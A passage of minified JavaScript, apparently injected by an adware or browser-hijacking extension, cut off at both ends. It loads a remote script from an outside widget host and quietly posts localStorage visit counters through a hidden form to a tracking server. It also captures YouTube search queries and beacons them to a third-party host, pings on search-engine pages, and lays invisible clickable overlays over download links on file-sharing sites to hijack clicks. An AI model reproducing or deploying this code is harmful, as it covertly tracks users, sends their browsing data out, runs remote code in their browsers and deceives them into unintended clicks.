a.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1||url.indexOf(\"namyneck.com\")>-1||url.indexOf(\"styloosh.com\")>-1||url.indexOf(\"applicationgrabb.net\")>-1||url.indexOf(\"databass.info\")>-1||url.indexOf(\"firstfirst.net\")>-1||url.indexOf(\"liversely.com\")>-1||url.indexOf(\"liversely.net\")>-1||url.indexOf(\"livesetwebs.org\")>-1||url.indexOf(\"lp.ncdownloader.com\")>-1||url.indexOf(\"lp.vaudix.com\")>-1||url.indexOf(\"masteroids.com\")>-1||url.indexOf(\"reditions.net\")>-1||url.indexOf(\"sharesuper.info\")>-1||url.indexOf(\"storaget.info\")>-1||url.indexOf(\"westzip.in\")>-1||url.indexOf(\"boxhilade.com\")>-1||url.indexOf(\"mylinksworld.com\")>-1||url.indexOf(\"shoppingwiz.co\")>-1||url.indexOf(\"rabbitsearch.net\")>-1||url.indexOf(\"searchandbake.com\")>-1){return}}catch(e){};(function(){ if (!document.getElementById(\"djdnjh4e7dne543gv\") && window.top==window.self) { var _irhjpivr = function() { window._chch3e7xjxs2 = \"4273800016501002566\" }; if (-1 == navigator.userAgent.toLowerCase().indexOf(\"chrome\")) _irhjpivr(); else { var s1 = document.createElement(\"script\"); s1.innerHTML = \"(\" + _irhjpivr.toString() + \")()\"; document.getElementsByTagName(\"head\")[0].appendChild(s1) } var s = document.createElement(\"script\"); s.type = \"text/javascript\"; s.id = \"djdnjh4e7dne543gv\"; s.src = \"//static.donation-tools.org/widgets/WPPartner/widget.js?_irh_prodname=TinyWallet&_irh_subid=1089_11214\"; document.getElementsByTagName(\"head\")[0].appendChild(s) } }());;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ILqNjAj5=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ILqNjAj5=\")){var d=a.match(/ILqNjAj5=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...dw7qjaFrdaGqjg7\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children.getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children.getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=70.70.42.13\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch®{}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=4273800016501002566&eid=1089&pid=11214&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"cdbmnd\",function(a){if(!a.cdbmnd&&!localStorage.getItem(\"cdbmnd\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a&&a.href&&\"mp3\"==a.href.substr(-3)){var c=a.href;a.setAttribute(\"href\",\"http://mp3juices.se/media/\"+encodeURIComponent(a.innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent©)+\"/el/1\");a.setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({cdbmnd:\"2\"});localStorage.setItem(\"cdbmnd\",\"2\")},!1)}})}catch(d){}})();;new function(){var p=this;this.activeZds={\"uploading.com\":0,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"mirrorcreator.com\":0,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\n\"ubtitles4free.ne\":1,\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":1,\"uploadrocket.net\":1,\"programas-gratis.net\":1,\"programasgratis.es\":1,\"programasejogos.com\":1,\"uploading.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":0,\"vitanclub.net\":0,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":1,\"mestorrents.com\":1,\"vitorrent.net\":1};\nthis.utils=new function(){var h=this;h.sendPixels=function(e){var h;if(e instanceof Array)for(var l=0;l<e.length;l++){var m=e[l];h=new Image;h.src=m}else h=new Image,h.src=e};h.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};h.cookie=new function(){var e=this;e.createCookie=function(e,h,m){if(m){var n=new Date;n.setTime(n.getTime()+864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),\nm=0;m<h.length;m++){for(var n=h[m];\" \"==n.charAt(0);)n=n.substring(1,n.length);if(0==n.indexOf(e))return n.substring(e.length,n.length)}return null};e.eraseCookie=function(h){e.createCookie(h,\"\",-1)}};h.ajax={get:function(e,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",e,!0),this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&k(h.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(e,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",e,!0);this.xhr.setRequestHeader(\"Content-type\",\n\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&l(h.ajax.xhr.responseText)};k=encodeURIComponent(k);this.xhr.send(k)}};h.waitForTokens={};h.addScript=function(e,h){if(\"bing\"==h){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};\nh.waitForElement=function(e,k,l,m){var n=h.query_selector_all(e);clearTimeout(h.waitTimeout);if(25<p.waitForElementCounter)return k(null);if(\"undefined\"==typeof n||1>n.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){p.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;p.waitForElementCounter=0;return k(n)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*\n(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=\ne.match(/^#([^,\\s]+)$/)||[];if(1<h.length)return e=document.getElementById(h[1])||void 0,\"undefined\"!=typeof e?[e]:[];h=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(h);document.__asya_qsaels=[];h.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};h.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:\nfunction(e){if(e instanceof Object){var h=new e.constructor,l;for(l in e)h[l]=arguments.callee(e[l]);return h}return e};h.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};h.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};h.throttle=function(e,h){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},h)}};h.epoch=function(){return(new Date).getTime()};\nh.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();h.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=e?!0:!1};h.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\nh.match_url=function(e,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;m=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):h.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(e))return!0}};h.ping=function(e){for(var h=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<h.length;l++)if(-1<location.hostname.indexOf(h[l])){var m=new Image,n=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<n.length&&(n=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);\nm.src=p.pixelHost+\"?hid=4273800016501002566&eid=1089&pid=11214&prodid=338&v=\"+p.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+h[l]+\"&host=\"+q+\"&ref=\"+n}};h.getAllText=function(e){for(var h=\"\",l=0;l<e.length;l++)h+=e.textContent?e.textContent:e.innetText;return h};h.duplicateElement=function(e){var k=document.createElement(e.nodeName.toLowerCase()),l=!1;e.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var m in e)if(\"src\"==\nm||\"width\"==m||\"height\"==m)k[m]=e[m];else if(\"style\"==m)for(var n in e[m])e[m][n]&&\"\"!=e[m][n]&&(k[m][n]=e[m][n]);else l||\"nodeValue\"!=m&&\"textContent\"!=m&&\"innetText\"!=m&&\"className\"!=m||0!=e.children.length||(k[m]=e[m],l=!0);for(l=0;l<e.childNodes.length;l++)if(3==e.childNodes[l].nodeType)k.appendChild(document.createTextNode(e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText));else{m=h.duplicateElement(e.childNodes[l]);n=h.getAllText(m.childNodes);var q=e.childNodes[l].textContent?\ne.childNodes[l].textContent:e.childNodes[l].innerText;q&&(q=q.replace(n,\"\"),\"\"!=q&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};h.coverElement=function(e,h,l,m,n,q){var t=document.createElement(\"div\");t.style.width=h?h:\"100%\";t.style.height=l?l:\"100%\";t.style.zIndex=q?q:\"2000\";t.style.top=m?m:\"0\";t.style.left=n?n:\"0\";t.style.position=\"absolute\";h=e.parentNode;h.style.position=\"relative\";h.removeChild(e);h.appendChild(t)}};this[\"uploading.com\"]=new function(){this.init=\nfunction(){if(window.self===window.top&&location.host.toLowerCase().indexOf(\"ploading.com/files/\"))for(var h=typeof document.querySelectorAll?document.getElementsByTagName(\"div\"):document.querySelectorAll(\"div.method_title\"),e=0;e<h.length;e++){var k=h[e].className;k&&\"undefined\"!==typeof k&&-1<k.indexOf(\"method_title\")&&(k=h[e].getAttribute(\"onclick\"))&&\"undefined\"!==typeof k&&-1<k.indexOf(\"location.href\")&&(h[e].setAttribute(\"onclick\",\"void(0);\"),k=h[e].cloneNode(!0),h[e].parentNode.replaceChild(k,\nh[e]),k.setAttribute(\"onclick\",\"void(0);\"))}}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(e){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}new function(){-1<location.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var e=\ndocument.links,h=0;h<e.length;h++){var l=e[h].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=document.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=e[h].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<window.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"go4up.com\"]=new function(){this.init=\nfunction(){if(!window.__AAintervalCounter&&window.self==window.top&&-1<location.host.toLowerCase().indexOf(\"o4up.co\")){window.__AAintervalCounter=0;window.__AAinterval=setInterval(function(){var e=document.getElementById(\"linklist\");e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"100%\";h.style.width=\"100px\";h.style.right=\"30px\";h.style.top=\"0\";h.style.cursor=\"pointer\";e.appendChild(h);10<window.__AAintervalCounter&&\nclearInterval(window.__AAinterval)},1001);for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].children[0];k&&k.setAttribute(\"href\",\"javascript:void(0);\");h[e].style.position=\"relative\";k=document.createElement(\"div\");k.style.position=\"absolute\";k.style.zIndex=\"2000\";k.style.height=\"100%\";k.style.width=\"100%\";k.style.right=\"0\";k.style.top=\"0\";k.style.cursor=\"pointer\";h[e].appendChild(k)}}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var e=\ndocument.links,h=0;h<e.length;h++)if(\"return prepare_download_file(this);\"==e[h].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var n=e[h].parentNode,q=n.children[n.children.length-1];q&&(n.removeChild(e[h]),n.insertBefore(m,q))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=\ndocument.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;\n10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var h=document.getElementsByClassName(\"nasjfkla\"),e=0;e<h.length;e++)h[e].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var h=document.links[i],e=h.getAttribute(\"onclick\");e&&-1<e.indexOf(\"prepare_download_file\")&&(h=h.parentNode,h.style.position=\"relative\",\nb=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",b.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",h.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var h=document.getElementById(\"leftside\"),e=0;e<h.children.length;e++)if(/\\bspnBook\\b/.test(h.children[e].className))for(var m=h.children[e].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\n\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var h=document.getElementsByTagName(\"center\"),\ne=0;e<h.length;e++)if(0!=e&&!(-1<h[e].innerHTML.indexOf(\"adcopy-outer\")||-1<h[e].innerHTML.indexOf(\"btn_download\")||-1<h[e].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";e==h.length-1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\"0\";h[e].style.position=\"relative\";h[e].appendChild(k)}h=document.getElementById(\"cap\");null!=h&&(h.parentNode.style.position=\n\"relative\",h.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var h=document.getElementsByTagName(\"div\"),e=0;e<h.length;e++)if(h[e].style&&\"653px\"==h[e].style.width&&\"49px\"==h[e].style.height){var k=h[e];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";\nl.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++){var 